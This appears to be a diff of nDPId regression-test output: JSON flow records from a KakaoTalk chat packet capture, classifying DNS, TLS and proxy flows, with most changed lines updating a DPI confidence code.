+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 